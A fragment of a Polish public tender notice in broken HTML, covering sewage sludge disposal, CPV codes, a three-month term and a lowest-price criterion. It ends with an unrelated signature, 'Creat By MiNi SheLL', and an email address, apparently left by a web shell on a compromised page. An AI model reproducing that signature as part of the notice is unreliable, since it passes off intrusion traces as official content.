WARIANT 2:  inny sposób zagospodarowania osadu, odmienny niż określony przez zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.38.00-4, 90.51.37.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com